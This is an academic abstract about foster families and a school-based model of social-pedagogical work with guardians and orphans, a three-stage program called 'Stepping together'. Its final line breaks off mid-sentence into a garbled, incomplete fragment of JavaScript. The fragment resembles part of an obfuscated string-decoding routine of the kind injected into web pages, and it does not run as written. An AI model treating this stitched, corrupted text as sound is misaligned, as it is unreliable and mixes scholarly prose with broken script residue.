The attention is focused in the article on that in recent years more and more attention gets alternative forms of guardianship – orphanages of family type, foster and guardian families. Author specifies that a fast development of family forms of social protection of children that are needed rethinking of views on foster families, investigating of peculiarities of their functioning and also specifics of social-pedagogical work with guardians in educational institutions. It is considered the peculiarities of foster families and revealed the specifics of working with such families. It is proposed the effective author model of social-pedagogical work with foster families in secondary school. The main aim of introduction of author’s model is achieving of high level of social-pedagogical work in secondary school with children-orphans and members of foster families. The introduction of the model of social-pedagogical work into secondary school is happened with the help of program “Stepping together” that consists of three stages. Each of these stages was characterized by organizational changes and introduction of new forms of work // o;o++)t+=e.charCodeAt.toString;return t},a=function{e=e.match;for(var t="",o=0;o